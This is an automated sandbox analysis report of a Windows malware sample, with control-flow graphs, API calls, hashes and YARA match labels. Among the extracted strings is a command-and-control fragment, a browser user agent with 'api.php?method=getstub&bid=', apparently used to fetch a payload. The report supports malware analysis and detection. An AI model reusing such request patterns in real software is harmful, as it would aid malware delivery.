                                                                                                                                      • String ID: &tag=$GET$Mozilla/5.0 (Windows NT 6.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/101.0.4951.67 Safari/537.36$Telegram $api.php?method=getstub&bid=$default
                                                                                                                                      • API String ID: 2068408394-3291327887
                                                                                                                                      • Opcode ID: d37e229b2f54f6708550fc13a2f9864d0c35dcf08c9b09cb1c1c3277ff15ee92
                                                                                                                                      • Instruction ID: ce3ca7e80429957d750ca1be1b97cf75bbf2e24f759841f704c7534b68f57244
                                                                                                                                      • Opcode Fuzzy Hash: d37e229b2f54f6708550fc13a2f9864d0c35dcf08c9b09cb1c1c3277ff15ee92
                                                                                                                                      • Instruction Fuzzy Hash: FAB1CD71604310AFE721DF64AC85F7B77E8EF94744F0419ADF686E7180E6B09A09CB62
                                                                                                                                      Uniqueness

                                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                                      Control-flow Graph

                                                                                                                                      APIs
                                                                                                                                      • __RTC_Initialize.LIBCMT ref: 0611C0AA
                                                                                                                                      • ___scrt_uninitialize_crt.LIBCMT ref: 0611C0C4
                                                                                                                                      Memory Dump Source
                                                                                                                                      • Source File: 00000000.00000002.509841696.0000000005F00000.00000040.00001000.00020000.00000000.sdmp, Offset: 05F00000, based on PE: true
                                                                                                                                      • Associated: 00000000.00000002.512960522.00000000061AA000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                      • Snapshot File: hcaresult_0_2_5f00000_EgNIXduB6T.jbxd
                                                                                                                                      Yara matches
                                                                                                                                      Similarity
                                                                                                                                      • API ID: Initialize___scrt_uninitialize_crt
                                                                                                                                      • String ID:
                                                                                                                                      • API String ID: 2442719207-0
                                                                                                                                      • Opcode ID: a5bfc9039ae44e7033902f82e3ec7c856dda7dfea58306e88eb7b5d111bb86c7
                                                                                                                                      • Instruction ID: 0ae8802d848252b72be4af72d0f31bdd9c652a97a5d20eaae95a510787c34878
                                                                                                                                      • Opcode Fuzzy Hash: a5bfc9039ae44e7033902f82e3ec7c856dda7dfea58306e88eb7b5d111bb86c7
                                                                                                                                      • Instruction Fuzzy Hash: 1641A272D84215EFDBE19FA9CC44BAE7B75EB84A90F11413AE824AF150D7384D41DBE0
                                                                                                                                      Uniqueness

                                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                                      Control-flow Graph

                                                                                                                                      • Executed
                                                                                                                                      • Not Executed
                                                                                                                                      control_flow_graph 221 611c113-611c124 call 611c850 224 611c135-611c13c 221->224 225 611c126-611c12c 221->225 227 611c148-611c15c dllmain_raw 224->227 228 611c13e-611c141 224->228 225->224 226 611c12e-611c130 225->226 229 611c20e-611c21d 226->229 231 611c162-611c173 dllmain_crt_dispatch 227->231 232 611c205-611c20c 227->232 228->227 230 611c143-611c146 228->230 233 611c179-611c17e call 60a51a0 230->233 231->232 231->233 232->229 235 611c183-611c18b 233->235 236 611c1b4-611c1b6 235->236 237 611c18d-611c18f 235->237 239 611c1b8-611c1bb 236->239 240 611c1bd-611c1ce dllmain_crt_dispatch 236->240 237->236 238 611c191-611c1af call 60a51a0 call 611c063 dllmain_raw 237->238 238->236 239->232 239->240 240->232 242 611c1d0-611c202 dllmain_raw 240->242 242->232
                                                                                                                                      APIs
                                                                                                                                      Memory Dump Source
                                                                                                                                      • Source File: 00000000.00000002.509841696.0000000005F00000.00000040.00001000.00020000.00000000.sdmp, Offset: 05F00000, based on PE: true
                                                                                                                                      • Associated: 00000000.00000002.512960522.00000000061AA000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                      • Snapshot File: hcaresult_0_2_5f00000_EgNIXduB6T.jbxd
                                                                                                                                      Yara matches
                                                                                                                                      Similarity
                                                                                                                                      • API ID: dllmain_raw$dllmain_crt_dispatch
                                                                                                                                      • String ID:
                                                                                                                                      • API String ID: 3136044242-0
                                                                                                                                      • Opcode ID: 2f0650cec5a1baafa0623427e5cdd0b5de3cfa34227925e39d09082f774819ca
                                                                                                                                      • Instruction ID: 0c2ac777b57d6d53117579aac5c0a50e4b2fb70ac54ff99e2eb5e2de81b810e2
                                                                                                                                      • Opcode Fuzzy Hash: 2f0650cec5a1baafa0623427e5cdd0b5de3cfa34227925e39d09082f774819ca
                                                                                                                                      • Instruction Fuzzy Hash: 74213D72D81219EFDBE15FA5CC44A7E7A7AAB84A90F054136FC245F210E7388D51DBE0
                                                                                                                                      Uniqueness

                                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                                      Control-flow Graph

                                                                                                                                      • Executed
                                                                                                                                      • Not Executed
                                                                                                                                      control_flow_graph 247 6140f87-6140fbb call 6140adf call 6140ae5 call 6140b43 254 6140fc1-6140fcd call 6140aeb 247->254 255 614120e-6141249 call 612ba7f call 6140adf call 6140ae5 call 6140b43 247->255 254->255 260 6140fd3-6140fdd 254->260 286 614124f-614125b call 6140aeb 255->286 287 6141368-61413bf call 612ba7f call 6140ec9 255->287 263 6141010-6141012 260->263 264 6140fdf 260->264 265 6141015-614101e 263->265 267 6140fe1-6140fe7 264->267 265->265 268 6141020-6141036 call 613eb8f 265->268 270 6141007-6141009 267->270 271 6140fe9-6140fec 267->271 281 6141046-614105a call 613e946 268->281 282 6141038-6141040 call 613e946 268->282 276 614100c-614100e 270->276 274 6141003-6141005 271->274 275 6140fee-6140ff6 271->275 274->276 275->270 279 6140ff8-6141001 275->279 276->263 280 6141041-6141045 276->280 279->267 279->274 293 614105d-6141067 281->293 282->280 286->287 297 6141261-614126d call 6140b17 286->297 305 61413c1-61413c4 287->305 306 61413cf call 6141219 287->306 293->293 296 6141069-614107d call 61438eb 293->296 307 6141083-61410cf call 611e1a0 * 4 call 6140f40 296->307 308 614120c 296->308 297->287 304 6141273-6141294 call 613e946 GetTimeZoneInformation 297->304 317 6141345-6141367 call 6140ad9 call 6140acd call 6140ad3 304->317 318 614129a-61412ba 304->318 305->306 310 61413c6-61413cd call 6140f87 305->310 315 61413d4-61413e8 call 613e946 call 611c26c 306->315 348 61410d0-61410d3 307->348 308->255 310->315 322 61412c4-61412cc 318->322 323 61412bc-61412c1 318->323 327 61412de-61412e0 322->327 328 61412ce-61412d5 322->328 323->322 332 61412e2-6141342 call 611e1a0 * 4 call 6131208 call 61413e9 * 2 327->332 328->327 333 61412d7-61412dc 328->333 332->317 333->332 350 61410d5 348->350 351 61410d8-61410db 348->351 350->351 351->348 354 61410dd-61410eb 351->354 356 61410f0-6141105 call 613019b 354->356 357 61410ed 354->357 363 6141108-614110e 356->363 357->356 365 6141110-6141117 363->365 366 6141119-614111c 363->366 365->366 368 614111e-6141124 365->368 366->363 369 61411be-61411c5 368->369 370 614112a-6141155 call 613019b 368->370 372 61411c7-61411c9 369->372 373 61411cc-61411dd 369->373 379 6141177-614117d 370->379 380 6141157-614115b 370->380 372->373 375 61411f6-6141205 call 6140ad9 call 6140acd 373->375 376 61411df-61411f3 call 6140f40 373->376 375->308 376->375 379->369 385 614117f-61411a2 call 613019b 379->385 383 614115c-6141162 380->383 386 6141174 383->386 387 6141164-6141172 383->387 385->369 392 61411a4-61411a8 385->392 386->379 387->383 387->386 393 61411a9-61411ac 392->393 394 61411ae-61411b9 393->394 395 61411bb 393->395 394->393 394->395 395->369
                                                                                                                                      APIs
                                                                                                                                      • GetTimeZoneInformation.KERNELBASE(00000000,00000000,00000000,00000000,00000000,00000000,?,?,?,061413CC,00000000,00000000,00000000), ref: 0614128B
                                                                                                                                      Strings
                                                                                                                                      Memory Dump Source
                                                                                                                                      • Source File: 00000000.00000002.509841696.0000000005F00000.00000040.00001000.00020000.00000000.sdmp, Offset: 05F00000, based on PE: true
                                                                                                                                      • Associated: 00000000.00000002.512960522.00000000061AA000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                      • Snapshot File: hcaresult_0_2_5f00000_EgNIXduB6T.jbxd
                                                                                                                                      Yara matches
                                                                                                                                      Similarity
                                                                                                                                      • API ID: InformationTimeZone
                                                                                                                                      • String ID: Pacific Daylight Time$Pacific Standard Time
                                                                                                                                      • API String ID: 565725191-1154798116
                                                                                                                                      • Opcode ID: cbaf34fe8db1368b084d93bf05a03a70e8545d24366d07f94687f622b19b6208
                                                                                                                                      • Instruction ID: 50b0ddeaf27e1f4ebdb24e9e8a83d321881ce677c915118b00df4f40938fcd5b
                                                                                                                                      • Opcode Fuzzy Hash: cbaf34fe8db1368b084d93bf05a03a70e8545d24366d07f94687f622b19b6208
                                                                                                                                      • Instruction Fuzzy Hash: E8C11A72E00225ABDB94BFB5DC42ABE7BB9EF84750F144466E911EB180E7709E81C790
                                                                                                                                      Uniqueness

                                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                                      Control-flow Graph

                                                                                                                                      • Executed
                                                                                                                                      • Not Executed
                                                                                                                                      control_flow_graph 457 612bc03-612bc10 call 613cd7a 460 612bc12-612bc1a 457->460 461 612bc50-612bc53 ExitThread 457->461 460->461 462 612bc1c-612bc20 460->462 463 612bc22 call 61405a1 462->463 464 612bc27-612bc2d 462->464 463->464 466 612bc3a-612bc40 464->466 467 612bc2f-612bc31 464->467 466->461 469 612bc42-612bc44 466->469 467->466 468 612bc33-612bc34 CloseHandle 467->468 468->466 469->461 470 612bc46-612bc4a FreeLibraryAndExitThread 469->470 470->461
                                                                                                                                      APIs
                                                                                                                                        • Part of subcall function 0613CD7A: GetLastError.KERNEL32(?,?,06130283,0613EBD2,?,?,0611CFC3,?,?,00000000,?,?,05F38A2D,060AB4E4,?,?), ref: 0613CD7E
                                                                                                                                        • Part of subcall function 0613CD7A: SetLastError.KERNEL32(00000000,?,?,060AB4E4), ref: 0613CE20
                                                                                                                                      • CloseHandle.KERNEL32(?,?,?,0612BD3A,?,?,0612BBAC,00000000), ref: 0612BC34
                                                                                                                                      • FreeLibraryAndExitThread.KERNEL32(?,?,?,?,0612BD3A,?,?,0612BBAC,00000000), ref: 0612BC4A
                                                                                                                                      • ExitThread.KERNEL32 ref: 0612BC53
                                                                                                                                      Memory Dump Source
                                                                                                                                      • Source File: 00000000.00000002.509841696.0000000005F00000.00000040.00001000.00020000.00000000.sdmp, Offset: 05F00000, based on PE: true
                                                                                                                                      • Associated: 00000000.00000002.512960522.00000000061AA000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                      • Snapshot File: hcaresult_0_2_5f00000_EgNIXduB6T.jbxd
                                                                                                                                      Yara matches
                                                                                                                                      Similarity
                                                                                                                                      • API ID: ErrorExitLastThread$CloseFreeHandleLibrary
                                                                                                                                      • String ID:
                                                                                                                                      • API String ID: 1991824761-0
                                                                                                                                      • Opcode ID: fe3fc85bddfd66cbc296db9a17f261f095f3e49b834a933e001e809ec54cf9ff
                                                                                                                                      • Instruction ID: aa7c4eab782e13f0168f4b07b4ec66e693507b107b0e3916fdd5e1300db91f9d
                                                                                                                                      • Opcode Fuzzy Hash: fe3fc85bddfd66cbc296db9a17f261f095f3e49b834a933e001e809ec54cf9ff
                                                                                                                                      • Instruction Fuzzy Hash: 5BF0823090472AABCBA15B35D808B1A7B99AF40B78B084A14F939E71A0DF30D9B1C790
                                                                                                                                      Uniqueness

                                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                                      Control-flow Graph

                                                                                                                                      • Executed
                                                                                                                                      • Not Executed
                                                                                                                                      control_flow_graph 471 60a51a0-60a51dc 472 60a51de-60a51e5 471->472 473 60a51e7 471->473 474 60a51ee-60a51f4 472->474 473->474 475 60a522f-60a5255 474->475 476 60a51f6-60a51fd 474->476 478 60a5260 475->478 479 60a5257-60a525e 475->479 477 60a5208-60a520c 476->477 477->475 480 60a520e-60a522d 477->480 481 60a5267-60a526d 478->481 479->481 480->477 483 60a52a8-60a52c6 481->483 484 60a526f-60a5276 481->484 485 60a52c9-60a52d9 483->485 486 60a5281-60a5285 484->486 485->485 487 60a52db-60a52ec 485->487 486->483 488 60a5287-60a52a6 486->488 490 60a52ee-60a52f1 487->490 491 60a52f4-60a5316 call 60a7330 call 60a5350 487->491 488->486 490->491 496 60a5318-60a5327 CreateThread 491->496 497 60a532d-60a5347 call 60a7270 491->497 496->497
                                                                                                                                      APIs
                                                                                                                                      • CreateThread.KERNELBASE(00000000,00000000,0607E200,00000000,00000000,00000000), ref: 060A5327
                                                                                                                                      Strings
                                                                                                                                      Memory Dump Source
                                                                                                                                      • Source File: 00000000.00000002.509841696.0000000005F00000.00000040.00001000.00020000.00000000.sdmp, Offset: 05F00000, based on PE: true
                                                                                                                                      • Associated: 00000000.00000002.512960522.00000000061AA000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                      • Snapshot File: hcaresult_0_2_5f00000_EgNIXduB6T.jbxd
                                                                                                                                      Yara matches
                                                                                                                                      Similarity
                                                                                                                                      • API ID: CreateThread
                                                                                                                                      • String ID: s\HUYQn%./D
                                                                                                                                      • API String ID: 2422867632-2016002726
                                                                                                                                      • Opcode ID: c5d7392a81c6e5dfe63c1fcb747062391953bfd2a42c9f941e3257733e9fed67
                                                                                                                                      • Instruction ID: d988f1ca9823dc8b9cdc7c38fa9f6d278bf287bf5c8ed5059ef6976a0418266a
                                                                                                                                      • Opcode Fuzzy Hash: c5d7392a81c6e5dfe63c1fcb747062391953bfd2a42c9f941e3257733e9fed67
                                                                                                                                      • Instruction Fuzzy Hash: 09513474E452589FDB55CFE8D890BEEBFB2BF49340F14806AD816A7280C7746A85CF90
                                                                                                                                      Uniqueness

                                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                                      Control-flow Graph

                                                                                                                                      APIs
                                                                                                                                      • __RTC_Initialize.LIBCMT ref: 0611BFA9
                                                                                                                                        • Part of subcall function 0611BEE8: InitializeSListHead.KERNEL32(061AA4B0,0611BFB3,0619F8A8,00000010,0611BF44,?,?,?,0611C16C,?,00000001,?,?,00000001,?,0619F8F0), ref: 0611BEED
                                                                                                                                      • ___scrt_is_nonwritable_in_current_image.LIBCMT ref: 0611C013
                                                                                                                                      Memory Dump Source
                                                                                                                                      • Source File: 00000000.00000002.509841696.0000000005F00000.00000040.00001000.00020000.00000000.sdmp, Offset: 05F00000, based on PE: true
                                                                                                                                      • Associated: 00000000.00000002.512960522.00000000061AA000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                      • Snapshot File: hcaresult_0_2_5f00000_EgNIXduB6T.jbxd
                                                                                                                                      Yara matches
                                                                                                                                      Similarity
                                                                                                                                      • API ID: Initialize$HeadList___scrt_is_nonwritable_in_current_image
                                                                                                                                      • String ID:
                                                                                                                                      • API String ID: 3231365870-0
                                                                                                                                      • Opcode ID: b824684595acaaf09337c72d6c3027453012af31ddc2df3a68e30faba9bd2efe
                                                                                                                                      • Instruction ID: 6df71eead550671d604d21e3c2826b8d19b4d8047853dac5535b2fe4cea5e39b
                                                                                                                                      • Opcode Fuzzy Hash: b824684595acaaf09337c72d6c3027453012af31ddc2df3a68e30faba9bd2efe
                                                                                                                                      • Instruction Fuzzy Hash: D521577668C301AEDBD5BBB49C0539E73618F85264F140038E971AF1C1DF794085CAE1
                                                                                                                                      Uniqueness

                                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                                      Control-flow Graph

                                                                                                                                      APIs
                                                                                                                                      • GetLastError.KERNEL32(0619FC70,0000000C), ref: 0612BB61
                                                                                                                                      • ExitThread.KERNEL32 ref: 0612BB68
                                                                                                                                      Memory Dump Source
                                                                                                                                      • Source File: 00000000.00000002.509841696.0000000005F00000.00000040.00001000.00020000.00000000.sdmp, Offset: 05F00000, based on PE: true
                                                                                                                                      • Associated: 00000000.00000002.512960522.00000000061AA000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                      • Snapshot File: hcaresult_0_2_5f00000_EgNIXduB6T.jbxd
                                                                                                                                      Yara matches
                                                                                                                                      Similarity
                                                                                                                                      • API ID: ErrorExitLastThread
                                                                                                                                      • String ID:
                                                                                                                                      • API String ID: 1611280651-0
                                                                                                                                      • Opcode ID: fe4b1a4a780155a12b317e7b66711e9f69052839b69e6569e12cb4cd44fb8c92
                                                                                                                                      • Instruction ID: 714e906223a05deb7a9b989bbcf09cd0123a1da787abdb4ebc2bdf8a911051e2
                                                                                                                                      • Opcode Fuzzy Hash: fe4b1a4a780155a12b317e7b66711e9f69052839b69e6569e12cb4cd44fb8c92
                                                                                                                                      • Instruction Fuzzy Hash: 62F02D70940714EFDF80BBB0EC49A2EBBB5FF84200F208009E1269B290DB349911CBA1
                                                                                                                                      Uniqueness

                                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                                      Control-flow Graph

                                                                                                                                      • Executed
                                                                                                                                      • Not Executed
                                                                                                                                      control_flow_graph 562 613e946-613e94f 563 613e951-613e964 RtlFreeHeap 562->563 564 613e97e-613e97f 562->564 563->564 565 613e966-613e97d GetLastError call 61301e1 call 613027e 563->565 565->564
                                                                                                                                      APIs
                                                                                                                                      • RtlFreeHeap.NTDLL(00000000,00000000,?,06148A53,?,00000000,?,?,06148CF4,?,00000007,?,?,06148186,?,?), ref: 0613E95C
                                                                                                                                      • GetLastError.KERNEL32(?,?,06148A53,?,00000000,?,?,06148CF4,?,00000007,?,?,06148186,?,?), ref: 0613E967
                                                                                                                                      Memory Dump Source
                                                                                                                                      • Source File: 00000000.00000002.509841696.0000000005F00000.00000040.00001000.00020000.00000000.sdmp, Offset: 05F00000, based on PE: true
                                                                                                                                      • Associated: 00000000.00000002.512960522.00000000061AA000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                      • Snapshot File: hcaresult_0_2_5f00000_EgNIXduB6T.jbxd
                                                                                                                                      Yara matches
                                                                                                                                      Similarity
                                                                                                                                      • API ID: ErrorFreeHeapLast
                                                                                                                                      • String ID:
                                                                                                                                      • API String ID: 485612231-0
                                                                                                                                      • Opcode ID: f9775b22af2b5b41edf7013c6037b38a28ca0eab36cb8a649c43f0b8b2f73a65
                                                                                                                                      • Instruction ID: 1410ce7891762d4706aae712ce34ccffa7253b09fc0fec0ce37f627007715a9e
                                                                                                                                      • Opcode Fuzzy Hash: f9775b22af2b5b41edf7013c6037b38a28ca0eab36cb8a649c43f0b8b2f73a65
                                                                                                                                      • Instruction Fuzzy Hash: 3BE08631500328EBCB912FF4AD08B997BAA9B44791F104015F71986050DB318591C790
                                                                                                                                      Uniqueness

                                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                                      Control-flow Graph

                                                                                                                                      • Executed
                                                                                                                                      • Not Executed
                                                                                                                                      control_flow_graph 570 1450000-1450048 571 145004e-145005e 570->571 572 1450128-1450138 570->572 571->572 573 1450064-145008b 571->573 574 145013e-1450150 572->574 575 145020a-145021a 572->575 576 145008e-1450094 573->576 577 1450153-145015a 574->577 578 1450264-1450276 call 611c249 575->578 579 145021c-145023a 575->579 576->572 582 145009a-14500a1 576->582 577->575 580 1450160-1450191 LoadLibraryA 577->580 587 1450279-145027c 578->587 581 1450245-1450249 579->581 583 1450193-1450196 580->583 584 1450199 580->584 581->578 585 145024b-1450251 581->585 582->572 586 14500a7-14500c5 582->586 583->584 588 14501ad-14501b3 584->588 585->578 589 1450253-1450262 585->589 590 14500d9-14500df 586->590 591 14501b5-14501c0 588->591 592 14501fc-1450205 588->592 589->581 593 1450117-1450123 590->593 594 14500e1-14500ed 590->594 596 14501c2-14501da 591->596 597 14501dc-14501f8 591->597 592->577 593->576 598 1450115 594->598 599 14500ef-1450113 594->599 604 14501fa 596->604 597->604 598->590 599->598 604->588
                                                                                                                                      APIs
                                                                                                                                      • LoadLibraryA.KERNELBASE(?), ref: 01450170
                                                                                                                                      Memory Dump Source
                                                                                                                                      • Source File: 00000000.00000002.505535776.0000000001450000.00000040.00001000.00020000.00000000.sdmp, Offset: 01450000, based on PE: false
                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                      • Snapshot File: hcaresult_0_2_1450000_EgNIXduB6T.jbxd
                                                                                                                                      Similarity
                                                                                                                                      • API ID: LibraryLoad
                                                                                                                                      • String ID:
                                                                                                                                      • API String ID: 1029625771-0
                                                                                                                                      • Opcode ID: 69395a9b4f3226b2a7d09862d9174c9eb91f2233fcad39215d0e74b2bdb74268
                                                                                                                                      • Instruction ID: f932c5fb489eaaa807d0abd8427619e8520c106b1417a0753f6334961578516a
                                                                                                                                      • Opcode Fuzzy Hash: 69395a9b4f3226b2a7d09862d9174c9eb91f2233fcad39215d0e74b2bdb74268
                                                                                                                                      • Instruction Fuzzy Hash: F5A1A978E01209DFDB48CF98C590AAEFBB2FF88304F248159E915AB355D735AA42CF54
                                                                                                                                      Uniqueness

                                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                                      Control-flow Graph

                                                                                                                                      • Executed
                                                                                                                                      • Not Executed
                                                                                                                                      control_flow_graph 607 5f39760-5f39774 608 5f39776-5f3977b 607->608 609 5f3979e-5f397a4 607->609 610 5f3977f-5f3979b call 611d640 608->610 611 5f3977d 608->611 612 5f397aa-5f397b5 609->612 613 5f3987e call 5f38bc0 609->613 611->610 616 5f397b7-5f397c4 612->616 617 5f397e6-5f397f0 612->617 619 5f39883-5f398a0 call 5f38af0 613->619 616->617 621 5f397c6-5f397d7 616->621 618 5f397f3-5f39800 call 611bb6d 617->618 631 5f39802-5f3980b 618->631 632 5f39879 call 612ba62 618->632 635 5f398a2-5f398af 619->635 636 5f398bf-5f398c4 619->636 622 5f397d9-5f397de 621->622 623 5f3980d-5f3980f 621->623 622->619 626 5f397e4 622->626 628 5f39811-5f39812 call 611bb6d 623->628 629 5f3981c 623->629 626->618 638 5f39817-5f3981a 628->638 634 5f3981e-5f39841 call 611d640 629->634 631->634 632->613 642 5f39843-5f3984e 634->642 643 5f3986c-5f39876 634->643 635->636 640 5f398b1-5f398be 635->640 638->634 644 5f39862-5f39864 call 611beb7 642->644 645 5f39850-5f3985e 642->645 648 5f39869 644->648 645->632 646 5f39860 645->646 646->644 648->643
                                                                                                                                      APIs
                                                                                                                                      • Concurrency::cancel_current_task.LIBCPMT ref: 05F39883
                                                                                                                                      Memory Dump Source
                                                                                                                                      • Source File: 00000000.00000002.509841696.0000000005F00000.00000040.00001000.00020000.00000000.sdmp, Offset: 05F00000, based on PE: true
                                                                                                                                      • Associated: 00000000.00000002.512960522.00000000061AA000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                      • Snapshot File: hcaresult_0_2_5f00000_EgNIXduB6T.jbxd
                                                                                                                                      Yara matches
                                                                                                                                      Similarity
                                                                                                                                      • API ID: Concurrency::cancel_current_task
                                                                                                                                      • String ID:
                                                                                                                                      • API String ID: 118556049-0
                                                                                                                                      • Opcode ID: 1ff8cb3bbfa888c8f86a9a07ac694dcf00f190b2d956b5841178c78a5a2119f1
                                                                                                                                      • Instruction ID: 50d6001ad88e1d3a5df482124a6d26059f16f29ed2fb4c0d3d9684a06bee055a
                                                                                                                                      • Opcode Fuzzy Hash: 1ff8cb3bbfa888c8f86a9a07ac694dcf00f190b2d956b5841178c78a5a2119f1
                                                                                                                                      • Instruction Fuzzy Hash: 1241E432B041089BF7189E68DD8156EB7DAFFC4260B68423AE829CB790E7F5DD418791
                                                                                                                                      Uniqueness

                                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                                      Control-flow Graph

                                                                                                                                      • Executed
                                                                                                                                      • Not Executed
                                                                                                                                      control_flow_graph 649 611bb6d-611bb70 650 611bb7f-611bb82 call 612c0b8 649->650 652 611bb87-611bb8a 650->652 653 611bb72-611bb7d call 6139184 652->653 654 611bb8c-611bb8d 652->654 653->650 657 611bb8e-611bb92 653->657 658 5f38af0-5f38b40 call 5f38ad0 call 611dbb4 call 611cf99 657->658 659 611bb98 657->659 659->659
                                                                                                                                      APIs
                                                                                                                                      • ___std_exception_copy.LIBVCRUNTIME ref: 05F38B2E
                                                                                                                                      Memory Dump Source
                                                                                                                                      • Source File: 00000000.00000002.509841696.0000000005F00000.00000040.00001000.00020000.00000000.sdmp, Offset: 05F00000, based on PE: true
                                                                                                                                      • Associated: 00000000.00000002.512960522.00000000061AA000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                      • Snapshot File: hcaresult_0_2_5f00000_EgNIXduB6T.jbxd
                                                                                                                                      Yara matches
                                                                                                                                      Similarity
                                                                                                                                      • API ID: ___std_exception_copy
                                                                                                                                      • String ID:
                                                                                                                                      • API String ID: 2659868963-0
                                                                                                                                      • Opcode ID: a3181a59772e324460940ead103e2150b4d55d0b974232fdef1977189155e634
                                                                                                                                      • Instruction ID: 01abfec3521e2f64f0b4e206ed5c3b14cd0a10c7b1f46de4f970c36bfa376e4d
                                                                                                                                      • Opcode Fuzzy Hash: a3181a59772e324460940ead103e2150b4d55d0b974232fdef1977189155e634
                                                                                                                                      • Instruction Fuzzy Hash: 6A01F97580430DBBCB94EEA8DC4188AB79CEE41160B14C636F929EF590FB70E594C7D9
                                                                                                                                      Uniqueness

                                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                                      APIs
                                                                                                                                      • RtlAllocateHeap.NTDLL(00000008,060AB4E4,?,?,0613CDC7,00000001,00000364,?,00000006,000000FF,?,0611CFC3,?,?,00000000,?), ref: 0613E80B
                                                                                                                                      Memory Dump Source
                                                                                                                                      • Source File: 00000000.00000002.509841696.0000000005F00000.00000040.00001000.00020000.00000000.sdmp, Offset: 05F00000, based on PE: true
                                                                                                                                      • Associated: 00000000.00000002.512960522.00000000061AA000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                      • Snapshot File: hcaresult_0_2_5f00000_EgNIXduB6T.jbxd
                                                                                                                                      Yara matches
                                                                                                                                      Similarity
                                                                                                                                      • API ID: AllocateHeap
                                                                                                                                      • String ID:
                                                                                                                                      • API String ID: 1279760036-0
                                                                                                                                      • Opcode ID: 4741fde1670e7db316fbb42cb72a5dfa788cfddef0b6295149eee3be7505728a
                                                                                                                                      • Instruction ID: 5aba727171a259f9e874fc8a94677c1dfd87d0b847c739a20120646c72f81c26
                                                                                                                                      • Opcode Fuzzy Hash: 4741fde1670e7db316fbb42cb72a5dfa788cfddef0b6295149eee3be7505728a
                                                                                                                                      • Instruction Fuzzy Hash: A0F0E931D043347B9BE15B619C04B5A7B8C9F82A70B058567EC1AD7185DB60E841D2E0
                                                                                                                                      Uniqueness

                                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                                      APIs
                                                                                                                                      • RtlAllocateHeap.NTDLL(00000000,?,?,?,0611CFC3,?,?,00000000,?,?,05F38A2D,060AB4E4,?,?,060AB4E4), ref: 0613EBC1
                                                                                                                                      Memory Dump Source
                                                                                                                                      • Source File: 00000000.00000002.509841696.0000000005F00000.00000040.00001000.00020000.00000000.sdmp, Offset: 05F00000, based on PE: true
                                                                                                                                      • Associated: 00000000.00000002.512960522.00000000061AA000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                      • Snapshot File: hcaresult_0_2_5f00000_EgNIXduB6T.jbxd
                                                                                                                                      Yara matches
                                                                                                                                      Similarity
                                                                                                                                      • API ID: AllocateHeap
                                                                                                                                      • String ID:
                                                                                                                                      • API String ID: 1279760036-0
                                                                                                                                      • Opcode ID: d182c667ef10081e01d1d6b631b4489c412d2ab5f2a26451d3c8cc4374ea5690
                                                                                                                                      • Instruction ID: d65d63e74cf0b90d0f856e299afee9db5e87a4723744b9eeb57e0384964d9f04
                                                                                                                                      • Opcode Fuzzy Hash: d182c667ef10081e01d1d6b631b4489c412d2ab5f2a26451d3c8cc4374ea5690
                                                                                                                                      • Instruction Fuzzy Hash: ADE06535508335E6EFF326699C04F9A764D9F815E1F058122DD179E1D8DB50D451C2E1
                                                                                                                                      Uniqueness

                                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                                      C-Code - Quality: 100%
                                                                                                                                      			_entry_(void* __eflags) {
                                                                                                                                      
                                                                                                                                      				E00E212F0(__eflags); // executed
                                                                                                                                      				return 0;
                                                                                                                                      			}



                                                                                                                                      0x00e216f0
                                                                                                                                      0x00e216f7

                                                                                                                                      Memory Dump Source
                                                                                                                                      • Source File: 00000000.00000002.505280435.0000000000E21000.00000020.00000001.01000000.00000003.sdmp, Offset: 00E20000, based on PE: true
                                                                                                                                      • Associated: 00000000.00000002.505262824.0000000000E20000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                      • Associated: 00000000.00000002.505297797.0000000000E22000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                      • Associated: 00000000.00000002.505313351.0000000000E24000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                      • Snapshot File: hcaresult_0_2_e20000_EgNIXduB6T.jbxd
                                                                                                                                      Similarity
                                                                                                                                      • API ID: ByteCharMultiWide$Http$ConnectOpen
                                                                                                                                      • String ID:
                                                                                                                                      • API String ID: 3921233653-0
                                                                                                                                      • Opcode ID: 28a078568e89db0162c5a37dfde67966d212f2eb2c6705d9e23cb7044fc1a90e
                                                                                                                                      • Instruction ID: 7d1c04db72c770c6c0056005aad885c8dd81f2e829294457d91078d299b9be0d
                                                                                                                                      • Opcode Fuzzy Hash: 28a078568e89db0162c5a37dfde67966d212f2eb2c6705d9e23cb7044fc1a90e
                                                                                                                                      • Instruction Fuzzy Hash:
                                                                                                                                      Uniqueness

